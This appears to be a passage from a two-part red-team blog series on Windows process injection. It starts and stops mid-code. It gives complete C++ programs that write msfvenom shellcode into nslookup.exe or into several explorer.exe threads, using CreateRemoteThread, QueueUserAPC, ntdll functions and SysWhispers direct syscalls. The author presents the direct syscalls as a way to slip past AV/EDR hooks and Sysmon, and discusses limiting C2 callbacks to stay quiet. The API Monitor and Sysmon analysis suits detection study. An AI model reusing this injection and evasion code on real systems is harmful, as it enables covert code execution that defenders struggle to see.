    NtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    NtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
    NtQueueApcThread(hThread, (PKNORMAL_ROUTINE)allocation_start, allocation_start, NULL, NULL);
    NtResumeThread(hThread, NULL);  
    
}

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Total Number of Calls	165
Total Amount of Memory Used	112 KB

QueueUserAPC() Process Injection - Low Level API Analysis

We have an overall very low number of calls which, makes us much quieter. To top it off, we also only see the WaitForSingleObject() call which is called right after we execute CreateProcess() in order to let nslookup.exe initialize. We do not see any of our process injection calls within API Monitor. It goes to reason then that AV / EDR systems would have a very difficult time hooking not only direct syscalls but, a process injection technique that is undetectable by Sysmon (That does not mean other systems can’t detect it, they can.).

Sysmon Analysis

The Sysmon output is symmetrical to the High and Medium level analysis. Honestly, I just put the image here for continuity’ sake.

Real World Scenario

Let’s take a second and look at a real world example using this process injection technique. The reason for this section is to analyze the reliability of QueueUserAPC() injection and detail ways to make it more consistent. This code sample below is using the SysWhispers Direct Syscall Methodology just like the Low Level API example above. You will notice several differences within this source however. The first being we are not creating a process, we are in-fact looking for explorer.exe, obtaining a handle to the process, enumerating the processes threads, and injecting into five (5) of those threads.

#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>
#include <vector>
#include "common.h"


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    /* Objects to enumerate an external Process: */
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
    PROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) };
    DWORD dwProcessId;


    /* Objects for Process Injection: */
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    HANDLE hThread;
    HANDLE hProcess;


    /* Find an explorer.exe process and save PID: */
    if (Process32First(snapshot, &processEntry)) {
        while (_wcsicmp(processEntry.szExeFile, L"explorer.exe") != 0) {
            Process32Next(snapshot, &processEntry);
        }
    }
    dwProcessId = processEntry.th32ProcessID;
    std::cout << "Process ID: " << dwProcessId << std::endl;

    /* Open the Process, allocate memory, write shellcode */
	OBJECT_ATTRIBUTES pObjectAttributes;
	InitializeObjectAttributes(&pObjectAttributes, NULL, NULL, NULL, NULL);

    CLIENT_ID pClientId;
    pClientId.UniqueProcess = (PVOID)processEntry.th32ProcessID;
    pClientId.UniqueThread = (PVOID)0;

    allocation_start = nullptr;
    NtOpenProcess(&hProcess, MAXIMUM_ALLOWED, &pObjectAttributes, &pClientId);
    NtAllocateVirtualMemory(hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    NtWriteVirtualMemory(hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
  

    /* Enumerate all the threads assocaited with explorer.exe and save to vector */
    THREADENTRY32 threadEntry = { sizeof(THREADENTRY32) };
    std::vector<DWORD> threadIds;
    if (Thread32First(snapshot, &threadEntry)) {
        do {
            if (threadEntry.th32OwnerProcessID == processEntry.th32ProcessID) {
                threadIds.push_back(threadEntry.th32ThreadID);
            }
        } while (Thread32Next(snapshot, &threadEntry));
    }
    std::cout << "Total Threads Found: " << threadIds.size() << std::endl;


    /* For each thread assocated with Explorer.exe, open the thread and assign it
    *  the APC to execute our shellcode: */
    int count = 0;  
    for (DWORD threadId : threadIds) {
        std::cout << "Injecting into Thread: " << threadId << std::endl;

        OBJECT_ATTRIBUTES tObjectAttributes;
        InitializeObjectAttributes(&tObjectAttributes, NULL, NULL, NULL, NULL);

        CLIENT_ID tClientId;
        tClientId.UniqueProcess = (PVOID)dwProcessId;
        tClientId.UniqueThread = (PVOID)threadId;

        NtOpenThread(&hThread, MAXIMUM_ALLOWED, &tObjectAttributes, &tClientId);
        NtSuspendThread(hThread, NULL);
        NtQueueApcThread(hThread, (PKNORMAL_ROUTINE)allocation_start, allocation_start, NULL, NULL);
        NtResumeThread(hThread, NULL);
        count++;

        // Limit Injection to 5 threads.
        if (count == 5) {
            break;
        }
    }
}

When utilizing this form of process injection, it’s necessary to inject into 3-5 threads for reliability. That’s the first reason we hard code a five (5) thread injection limit. The second reason being, we don’t want to get 20-50 threads to execute our shellcode and obtain 20-50 remote callbacks to our C2. That’s just way too loud! For example, we are injecting into explorer.exe which is always going to be running. At any time, that process is going to have 20-50 threads running so, we limit our impact by only using 5.

The thread limit could actually be avoided via a check for C2 traffic and a Mutex but, I’m not going to detail that here.

QueueUserAPC() Process Injection - Real World Example Analysis

Once we execute the binary, we can see that the program found 35 threads associated with explorer.exe, and we injected into five (5) of those threads. We only received three (3) notepad.exe instances meaning that of the five (5) threads, only three (3) of those threads successfully executed our shellcode. In my experience, only 60%-70% of the injected threads successfully execute and it’s extremely variable with limited consistency.

The other issue I see often is that we crash the application we inject into. This is the case with several forms of process injection but with QueueUserAPC(), there is a very high probability of crashing explorer.exe considering the example above. And as a matter of a fact, we do crash explorer.exe during our injection.

QueueUserAPC() Process Injection - Real World Example Sysmon Analysis

This example shows the variability and overall success probability that should be taken into account each time you use this technique. We don’t want to crash systems, and we don’t want to impact employees day-to-day operations so, choose the process carefully and limit the overall exposure.

Conclusion

The ability execute our shellcode using direct syscalls rather than using Windows dependencies (Documented API, ntdll.dll, kernerl32.dll) allows for a much quieter and streamlined compromise. However, we were also able to circumvent common process injection detection via Sysmon by using QueueUserAPC() instead of CreateRemoteThread(). The image below details the QueueUserAPC Process Injection API calls that were observed via API Monitor.

QueueUserAPC() Process Injection - All API Analysis

QueueUserAPC() Vs. CreateRemoteThread()

Injection Type	API Level	Total API Calls	Total Memory Used
CreateRemoteThread()	High	298	192 KB
CreateRemoteThread()	Medium	309	196 KB
CreateRemoteThread()	Low	288	186 KB
QueueUserAPC()	High	174	116 KB
QueueUserAPC()	Medium	199	127 KB
QueueUserAPC()	Low	165	112 KB

It’s worth mentioning the differences in the two process injection techniques we’ve looked at so far. It’s apparent that the CreateRemoteThread() is louder, easier to detect, and is the most common API call for process injection. CreateRemoteThread() Is also very reliable whereas QueueUserAPC() can be a bit unpredictable if you’re opening and already instantiated process and injecting into one of its threads. However, generating a process and injecting into it seems to create a much higher probability of success, as seen in all the examples above.

It’s fairly obvious that if you want to be quieter / more stealthy, QueueUserAPC() has the advantage.

Process Injection Part 2 | QueueUserAPC()
Joshua

Process Injection Part 1 | CreateRemoteThread()

Sevro Security

Joshua

8 April 2020 at 19:17

Sevro Security
Process Injection Part 1 | CreateRemoteThread()

In this new series, I am going to dive deep into Windows Process Injection. The purpose of this series is to dig into how each injection technique works at its core. Each post is going to be broken down into four (4) parts:

Process Injection Primer – Subject to the injection technique, we will review how this type of injection works programmatically.
Analyze High Level Windows API Calls – Use the MSDN Documented methods and functions.
1. API Call Analysis
2. Sysmon events and logging
Analyze Medium Level Windows Syscalls Using LoadLibrary – Use the NTAPI Undocumented functions via ntdll.dll
1. API Call Analysis
2. Sysmon events and logging
Analyze Low Level Windows Syscalls Using x86 Assembly – Custom via Rolling Our Own Syscalls
1. API Call Analysis
2. Sysmon events and logging

I am piggy backing off the phenomenal research conducted by Outflank as well as a project developed by @Jackson_T called SysWhispers that auto generates a x86 ASM functions and header files. Incredible work to say the least.

Each post in this series will contain source code that is written in C++ with both High Level API calls and corresponding Low Level Syscalls. For continuity, I am going to be compiling all my builds for x64 bit architectures.

Reference Material

For high level Windows API Calls. We will use the official Microsoft MSDN Documentation. For all the undocumented functions, which is what we will be using when we want to conduct direct system calls, we will reference the NTAPI Undocumented Functions. If you’re unfamiliar with Syscalls and the Windows API’s I will provide a small Process Injection primer however, I am not detailing how Windows User v. Kernel mode works and the associated rings. I highly suggest you read Outflanks Blog Post in order to understand more.

Code Examples:

All code examples use the same 64-bit shellcode generated from the Metasploit Frameworks Msfvenom tool.
- msfvenom -p windows/x64/exec CMD=notepad.exe -f c
- The shellcode executes Notepad.exe.

System Configuration / Tools:

Sysmon installed with SwiftOnSecurity’s configuration.
API Monitor to analyze all function calls.
I generated common.asm and common.h files using the SysWhispers Repository and followed the repositories directions on how to add the files to an existing Visual Studio C++ project.
- python syswhispers.py -p common -o common

Process Injection Primer

In regards to CreateRemoteThread() process injection, there are really three (3) main objectives that need to happen:

VirtualAllocEx() – Be able to access an external process in order to allocate memory within its virtual address space.
WriteProcessMemory() – Write shellcode to the allocated memory.
CreateRemoteThread() – Have the external process execute said shellcode within another thread.

Example

LPVOID allocation_start;
allocation_start = VirtualAllocEx(pi.hProcess, NULL, allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, allocation_start, shellcode, allocation_size, NULL);
CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)allocation_start, NULL, 0, 0);

VirtualAllocEx()

We first need to allocate a chunk of memory that is the same size as our shellcode. VirtualAllocEx is the Windows API we need to call in order to initialize a buffer space that resides in a region of memory within the virtual address space of a specified process (i.e., the process we want to inject into).

VirtualAllocEx – Reserves, Commits, or Changes the state of memory within a specified process. This API call takes an additional parameter, compared to VirtualAlloc, (HANDLE hProcess) which is a Handle to the victim process.

LPVOID VirtualAllocEx(
  HANDLE hProcess,
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

Looking at example above, we have a HANDLE to an external process (nslookup.exe in this case). With this handle, we can allocate a buffer the same size as our shellcode within the victim processes virtual memory pages.

The image above is a snapshot of a Visual Studio Debugging session. I set a break point at the VirtualAllocEx CALL and then stepped over it in order to execute it. We can see that VirtualAllocEx() allocated a buffer located at 0x000001efdc9d000. This memory allocation should be within the nslookup.exe process space. To confirm, we can open the nslookup.exe process in ProcessHacker -→ properties -→ memory and look for the memory region we see in the debugger.

WriteProcessMemory()

Now that we have allocated a buffer the same size as our shellcode, we can write our shellcode into that buffer.

WriteProcessMemory() – Writes data to an area of memory in a specified process.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

In the Visual Studio Debugger, I step forward once again which executes the WriteProcessMemory CALL. This writes the contents of our shellcode into the victim processes allocated memory space. In ProcessHacker, we can conduct a memory dump of the nslookup.exe and when we specifically analyze the memory we allocated via the VirtualAllocEx CALL, we can see that our shellcode was properly written to the nslookup.exe buffer.

ProcessHacker.exe analysis of WriteProcessMemory

CreateRemoteThread()

With the shellcode loaded into the allocated virtual memory space of the victim process, we can now tell the victim process to create a new thread starting at the address of our shellcode buffer.

CreateRemoteThread() – Creates a thread that runs in the virtual address space of another process.

HANDLE CreateRemoteThread(
  HANDLE                 hProcess,
  LPSECURITY_ATTRIBUTES  lpThreadAttributes,
  SIZE_T                 dwStackSize,
  LPTHREAD_START_ROUTINE lpStartAddress,
  LPVOID                 lpParameter,
  DWORD                  dwCreationFlags,
  LPDWORD                lpThreadId
);

Stepping forward for the last time, we execute CreateRemoteThread and get a Notpad.exe instance.

Final Process Injection executing Notepad.exe

High Level Windows API

In the example below, I create a 64-bit Nslookup.exe process and then inject into it using default Metasploit shellcode that simply creates an instance of Notepad.exe. This is not a very “clean” method of injection but for the purpose of this example, it works. This example details the proper / MSDN documented method of executing code within a different process space.

#include <iostream>
#include <Windows.h>
#include "common.h"

int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure (removed extra parentheses)
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 

    // Inject into the 64-bit process:
    // HIGH-LEVEL WINDOWS API:
    allocation_start = VirtualAllocEx(pi.hProcess, NULL, allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(pi.hProcess, allocation_start, shellcode, allocation_size, NULL);
    CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)allocation_start, NULL, 0, 0);
}

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services, Undocumented].

Item	Count
Number of API Calls	298
Total Amount of Memory User	192 KB

API Monitor Analysis of High-Level API calls

Basic analysis of the API calls makes it very objective that the program is accessing and manipulating memory of an external process. When we narrow in and only look at,CRT_High_Level_API.exe and KERNELBASE.DLL we see each and every function call. The great part or API Monitor is that we can also analyze the decoded function parameters and the memory page at the time of the instruction/CALL.

As a mental note, look at the image above and look at each CRT_High_Level_API.exe function call (High Level API) and look at the lower level API functions the OS Calls. There is a distinct difference here and it’s one worth noting as we will call those functions’ direction when we look at the Low-Level API calls.

Sysmon Analysis

Sysmon detected five (5) distinct events related to CRT_High_Level_API.exe:

Process Create – CRT_High_Level_API.exe
Process Create – nslookup.exe
CreateRemoteThread – Process Injection into nslookup.exe
Process Terminated – CRT_High_Level_API.exe exit
Process Create – nslookup.exe executes shellcode which opensnotepad.exe

For all testing, these events are going to be symmetrical considering how the Sysmon driver hooks syscalls. This is a great tool for Blue Team because, no matter how low we go, Sysmon “Should” be able to catch our CreateRemoteThread() process injection. But with a claim like that, let’s look at why Sysmon is so damn powerful.

Sysmon’s Power

Procmon Analysis of High-Level API execution in User-Land and Kernel-Land

The image above depicts the User-Land vs. Kernel-Land. In the example above, we executed the ntdll.dll!NtQueryVirtualMemory function and that set a chain of events that eventually ended up in Kernel-Land issuing a syscall. Many AV / EDR solutions run in User-Land and do not (can’t) touch Kernel-Land. That’s why later in this post, we are going to circumvent running to Kernel-Land to execute a syscall and just do it ourselves. But, Sysmon is different in that a driver is loaded (SysmonDrv.sys) that will still hook and enumerate the syscall regardless of where the instruction is executed.

Medium Level API – Ntdll.dll

We have set up a program that moves away from using the High-Level API and directly calls the undocumented functions that are resident within ntdll.dll. You’ll notice that we now have a series of new structs and custom types that are necessary in order to load the required functions and execute them properly.

The goal of this code is to mitigate the High-Level function calls that the OS then translates to several Lower-Level API calls by simply calling the lower-level API ourselves.

#include <iostream>
#include <Windows.h>

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _PS_ATTRIBUTE
{
    ULONG  Attribute;
    SIZE_T Size;
    union
    {
        ULONG Value;
        PVOID ValuePtr;
    } u1;
    PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST
{
    SIZE_T       TotalLength;
    PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;


typedef NTSTATUS(WINAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";


    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;
    
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure (removed extra parentheses)
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 


    // Inject into the 64-bit process:
    // LoadLibary MEDIUM-LEVEL UNDOCUMENTED API:
    HINSTANCE hNtdll = LoadLibrary(L"ntdll.dll");
    NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");
    allocation_start = nullptr;

    status = NtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    status = NtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
    status = NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, pi.hProcess, allocation_start, allocation_start, FALSE, NULL, NULL, NULL, NULL);
}

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Number of API Calls	309
Total Amount of Memory User	196 KB

There was an uptick in overall API Calls and size of memory used (not a big deal). But, we successfully bypassed using the High-Level API to execute shellcode. When we look at the actual API Calls (in the image below), we can see a distinct difference. All the API calls were called via the executable rather than being passed to KERNELBASE.dll. This is because we loaded ntdll.dll and then dynamically loaded the functions we needed in order to inject into nslookup.exe.

API Monitor Analysis of Medium-Level API calls

Sysmon Analysis

Sysmon caught all the same events as the High-Level API calls. This is to be expected since the driver has the capability to hook events subject to the configuration.

To get a better idea as to where Sysmon was hooking our syscalls, we can review the process stack right before shellcode execution in nslookup.exe to see if the SysmonDrv.sys driver was loaded. And that’s exactly what we see. Procmon is a bit limited as to the overall functions we can see within the stack trace (regardless of proper symbol loading) but we can easily discern our own event timeline subject to the Process Create, Process Start, and Thread Create operations.

Prcmon.exe Analysis of Medium-Level API calls

Reviewing the image above shows that right when nslookup.exe was executing the shellcode in a new thread, Sysmon observes an event that the Sysmon Configuration file says we are interested in so, it hooks it and analyzes it.

Low Level API – Direct Syscalls

This is where the fun really starts. To this point, we’ve used the Windows High-Level MSDN Documented methods of accessing process memory, changing process memory, and creating a remote thread within an external process. Next, we went one step lower and manually mapped the Nt* functions residing within ntdll.dll to our program and called them directly. Now, we’re going to completely remove any Windows DLL imports and manually conduct the syscalls with our own custom assembly rather than having ntdll.dll or kernelbase.dll do it for us.

I’ve used a tool called SysWhispers to generate both the header file (common.h) and the x86 assembly file (common.asm). I followed the repositories instructions on how to load both files into the Visual Studio C++ project and then compiled common.asm and included the common.h header.

#include <iostream>
#include <Windows.h>
#include "common.h"


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";


    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;
    
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure (removed extra parentheses)
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 


    // Inject into the 64-bit process:
    // SYSWHISPER LOW-LEVEL UNDOCUMENTED API:
    allocation_start = nullptr;
    NtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    NtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
